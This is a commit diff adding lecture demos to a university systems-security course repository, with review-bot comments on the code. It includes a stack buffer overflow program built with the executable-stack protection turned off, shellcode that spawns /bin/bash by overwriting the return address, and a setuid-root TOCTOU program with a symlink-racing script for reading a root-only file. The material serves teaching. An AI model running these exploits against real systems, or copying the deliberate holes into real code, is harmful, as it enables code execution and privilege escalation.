added demos
This commit is contained in:
parent
c95633f4eb
commit
58562dc628
|
@ -1,3 +1,6 @@
|
|||
# sfl-examples
|
||||
# Examples of the SFL lectures
|
||||
|
||||
Code examples of the SFL lecture
|
||||
Dear students,
|
||||
|
||||
In this repository, you can find all software demos and many code examples that are part of the SFL lecture series.
|
||||
In case you miss something, please send an email to christian.rossow [at] cs.uni-dortmund [dot] de.
|
||||
|
|
|
@ -0,0 +1,16 @@
|
|||
SOURCES = $(wildcard *.asm)
|
||||
OBJS = $(SOURCES:.asm=.o)
|
||||
EXECS = $(patsubst %.asm,%.runme,$(SOURCES))
|
||||
all: $(EXECS) bufoverflow
|
||||
|
||||
%.o: %.asm
|
||||
nasm -g -f elf64 $<
|
||||
|
||||
%.runme: %.o
|
||||
ld -o $@ $<
|
||||
|
||||
clean:
|
||||
rm -f *.o *.runme bufoverflow
|
||||
|
||||
bufoverflow:
|
||||
gcc bufoverflow.c -g -z execstack -o bufoverflow -O1 -fno-unroll-loops -fno-omit-frame-pointer -fno-dce -fno-dse
|
|
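Review bot: The `bufoverflow` rule at the end of the hunk has no prerequisite, so `make` never rebuilds it after `bufoverflow.c` changes and skips it entirely once the file exists; `bufoverflow: bufoverflow.c` fixes both. `all` and `clean` are not declared phony, so a stray file named `clean` would silence `make clean`; add `.PHONY: all clean`. The second Makefile hunk in this commit (the one beginning `all: $(EXECS)`) is missing the same `.PHONY` line. A short comment above the gcc line, such as `# -z execstack deliberately disables the non-executable stack; the demo needs it`, would make explicit to students that a mitigation is being switched off on purpose.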
@ -0,0 +1,37 @@
|
|||
// usage: bufoverflow <filename>
|
||||
//
|
||||
// files with more than 512B content will cause overflows.
|
||||
// smaller files work just fine.
|
||||
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
|
||||
/*
|
||||
before exploit after exploit
|
||||
|
||||
+++++++++++++ +++++++++++++
|
||||
+ saved RIP + <-- rbp+8 + &shellc +---\
|
||||
+++++++++++++ +++++++++++++ |
|
||||
+ saved RBP + <-- rbp + anything + |
|
||||
+++++++++++++ +++++++++++++ |
|
||||
+ + + + |
|
||||
+ + + + |
|
||||
... ... ... ... |
|
||||
+ + + + |
|
||||
+ (512 B) + + + |
|
||||
+ array + <-- rbp-0x200 + shellcode +<--/
|
||||
+++++++++++++ rsp +++++++++++++
|
||||
*/
|
||||
|
||||
int mystr(char *fn) {
|
||||
char mystr[512];
|
||||
register FILE *f = fopen(fn, "rb");
|
||||
fread(mystr, 1024, 1, f); // VULNERABLE! reading 1024B into 512B buf
|
||||
return mystr[0];
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
if (argc != 2) { printf("too few args."); return 1; }
|
||||
return mystr(argv[1]);
|
||||
}
|
|
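Review bot: The result of `register FILE *f = fopen(fn, "rb");` is never checked, so a missing or unreadable path makes `fread` dereference NULL and the demo crashes before the behaviour it is meant to show; add `if (!f) { perror(fn); return 1; }` after the call and `fclose(f)` before the return. The message in `main`, `printf("too few args.")`, is also printed when there are too many arguments and has no newline; `fprintf(stderr, "usage: %s <filename>\n", argv[0]);` matches the usage comment at the top of the file. The function `mystr` shadows its own name with the local array `mystr`, which is legal but confusing in a teaching example.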
@ -0,0 +1,23 @@
|
|||
bits 64
|
||||
|
||||
global _start
|
||||
_start:
|
||||
|
||||
times 128 nop
|
||||
|
||||
; 59 sys_execve const char *filename const char *const argv[] const char *const envp[]
|
||||
; (rdi, rsi, rdx, r10, r8, r9)
|
||||
mov rax, 59
|
||||
lea rdi, [rel binbash]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
syscall
|
||||
|
||||
times 5 nop
|
||||
|
||||
binbash:
|
||||
db '/bin/bash', 0x00
|
||||
|
||||
ALIGN 512 ; 512-byte alignment for this part
|
||||
times 8 nop ; overwrite saved rbp
|
||||
dq 0x7fffffffdcd0 ; overwrite rip ([rbp+8])
|
|
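Review bot: The final `dq 0x7fffffffdcd0` is an environment-specific constant with no comment saying where it comes from; a note such as `; stack address captured on the lecture VM — only valid with ASLR disabled and this exact binary` tells students why the demo stops working on a default system, which is the mitigation point of the lecture. The syscall number in `mov rax, 59` should be a named constant (`SYS_EXECVE equ 59`) to match the comment above it. The file has no `section` directive, so the `binbash` string ends up in `.text`; a one-line comment that this is intentional because the object is consumed as a raw byte blob would stop a reader from "fixing" it.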
@ -0,0 +1,13 @@
|
|||
SOURCES = $(wildcard *.asm)
|
||||
OBJS = $(SOURCES:.asm=.o)
|
||||
EXECS = $(patsubst %.asm,%.runme,$(SOURCES))
|
||||
all: $(EXECS)
|
||||
|
||||
%.o: %.asm
|
||||
nasm -g -f elf64 $<
|
||||
|
||||
%.runme: %.o
|
||||
ld -o $@ $<
|
||||
|
||||
clean:
|
||||
rm -f *.o *.runme
|
|
@ -0,0 +1,35 @@
|
|||
bits 64
|
||||
|
||||
SECTION .data
|
||||
var1: dq 0x0
|
||||
var2: dq 0x0
|
||||
|
||||
SECTION .text
|
||||
global _start
|
||||
_start:
|
||||
int3
|
||||
|
||||
read:
|
||||
mov rax, 0
|
||||
add rax, 4
|
||||
mov rbx, rax
|
||||
sub rax, 4
|
||||
xor rax, 0x10101010
|
||||
|
||||
xor rax, rax
|
||||
sub rax, 1
|
||||
add rax, 1
|
||||
|
||||
mov rax, -1
|
||||
mov rax, 0xFFFFFFFFFFFFFFFF
|
||||
|
||||
mov [var1], rax
|
||||
mov rax, var1
|
||||
|
||||
exit:
|
||||
; sys_exit(42)
|
||||
mov rax,60 ; system call number (sys_exit)
|
||||
mov rdi,42 ; system call return value
|
||||
syscall
|
||||
|
||||
times 64 nop
|
|
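Review bot: The comment on `mov rdi,42 ; system call return value` is wrong: rdi carries the exit status passed to sys_exit, not a value returned by the syscall; `; arg1: exit status` says what it is. The same mislabelled comment appears in the `exit:` block of the echo demo later in this commit. `mov rax, var1` just above `exit:` loads the absolute address of `var1` as an immediate, which only links for a non-PIE static binary; since the `nasm -f elf64` + `ld` build in this commit's Makefile produces exactly that, a comment stating it is deliberate (in contrast to `lea rax, [rel var1]`) would help. The hard-coded `60` should be `SYS_EXIT equ 60`.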
@ -0,0 +1,38 @@
|
|||
bits 64
|
||||
|
||||
SECTION .data
|
||||
; empty
|
||||
echobuf db 1024
|
||||
|
||||
SECTION .text
|
||||
|
||||
global _start
|
||||
_start:
|
||||
;int3
|
||||
|
||||
read:
|
||||
; sys_read(stdin, buf, buflen)
|
||||
mov rax,0
|
||||
mov rdi,0 ; arg1: fd (0 = stdin)
|
||||
lea rsi,[echobuf] ; arg2: buffer
|
||||
mov rdx,1024 ; arg3: buflen
|
||||
syscall
|
||||
|
||||
test rax, rax
|
||||
jz exit
|
||||
|
||||
; sys_write(stdout, buf, buflen)
|
||||
mov rdx,rax ; arg3: buflen
|
||||
mov rax,1 ; system call number (1 = sys_write)
|
||||
mov rdi,1 ; arg1: fd (1 = stdout)
|
||||
lea rsi,[echobuf] ; arg2: buffer
|
||||
syscall
|
||||
jmp read
|
||||
|
||||
exit:
|
||||
; sys_exit(42)
|
||||
mov rax,60 ; system call number (sys_exit)
|
||||
mov rdi,0 ; system call return value
|
||||
syscall
|
||||
|
||||
times 64 nop
|
|
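Review bot: `echobuf db 1024` defines a single byte (the value 1024 does not even fit and is truncated), not a 1024-byte buffer, so `sys_read` with `rdx,1024` writes up to 1023 bytes past the storage actually reserved in `.data`; reserve real space with `echobuf: resb 1024` under `SECTION .bss` (or `echobuf: times 1024 db 0` in `.data`). The `test rax, rax` / `jz exit` pair after the read only handles end-of-file: a negative `-errno` return is forwarded as the write length by `mov rdx,rax`; `jle exit` catches both EOF and error. `lea rsi,[echobuf]` without `default rel` assembles to an absolute address, which works for this static `ld` build but deserves a comment.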
@ -0,0 +1,10 @@
|
|||
all: setuid-toctou
|
||||
|
||||
clean:
|
||||
sudo rm -f setuid-toctou
|
||||
|
||||
# file must be owned by root, hence we `chown`
|
||||
setuid-toctou:
|
||||
gcc setuid-toctou.c -o setuid-toctou &&\
|
||||
chmod u+s ./setuid-toctou &&\
|
||||
sudo chown root:root ./setuid-toctou
|
|
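Review bot: In the `setuid-toctou` rule `chmod u+s` runs before `sudo chown root:root`, and on Linux changing a file's owner clears the set-user-ID bit (since 2.2.13 this applies to root as well), so the built binary is root-owned but not setuid and does not behave as the comment above the rule describes; run `sudo chown root:root ./setuid-toctou && sudo chmod u+s ./setuid-toctou` in that order. The rule also has no prerequisite on `setuid-toctou.c`, so source edits do not trigger a rebuild; `setuid-toctou: setuid-toctou.c`. `all` and `clean` should be listed in `.PHONY`.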
@ -0,0 +1,17 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Launch this script and then start
|
||||
# while true; do ./setuid-toctou ./symbolic_link ; done
|
||||
set -u
|
||||
set -e
|
||||
curdir=`pwd`
|
||||
|
||||
if [ ! -e ./setuid-toctou ]; then
|
||||
echo "program <setuid-toctou> not found. wrong directory?"
|
||||
exit -1
|
||||
fi
|
||||
|
||||
while true; do
|
||||
ln -f -s ${curdir}/hello ./symbolic_link # link to a user-readable file
|
||||
ln -f -s ${curdir}/secret ./symbolic_link # link to a root-readable file
|
||||
done
|
|
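Review bot: `exit -1` in the directory check is not a valid exit status (bash reports 255); use `exit 1`. `${curdir}` is expanded unquoted in both `ln` lines, so a working directory containing spaces breaks the script; write `"${curdir}/hello"` and `"${curdir}/secret"`, and prefer `curdir=$(pwd)` over backticks. The script loops forever; a sentence in the header that it must be stopped with Ctrl-C and that it leaves `./symbolic_link` behind would save students a cleanup step.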
@ -0,0 +1,28 @@
|
|||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
|
||||
|
||||
void main(int argc, char *argv[]) {
|
||||
char buf[1024];
|
||||
int fd;
|
||||
char *filename = argv[1];
|
||||
|
||||
if (access(filename, R_OK) != 0) {
|
||||
//printf("file '%s' not accessible by user\n", filename);
|
||||
exit(-1); // original user lacks permission
|
||||
}
|
||||
|
||||
// file at path `filename` exists and is readable
|
||||
// by the original user (i.e., not just by root)
|
||||
memset(buf, 0, 1024);
|
||||
fd = open(filename, O_RDONLY);
|
||||
if (fd == -1) {
|
||||
//perror("error in open()");
|
||||
} else {
|
||||
read(fd, buf, 1024);
|
||||
printf("%s", buf);
|
||||
}
|
||||
}
|
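Review bot: `argv[1]` is copied into `filename` without checking `argc`, so running the program with no argument passes NULL to `access` and `open`; guard with `if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); exit(1); }`. `read(fd, buf, 1024)` can fill the whole buffer, leaving no terminator for `printf("%s", buf)`, and its return value is ignored; `ssize_t n = read(fd, buf, sizeof buf - 1);` followed by `if (n > 0) buf[n] = '\0';` fixes both. `void main` should be `int main` so the process returns a proper status, and `fd` is never closed.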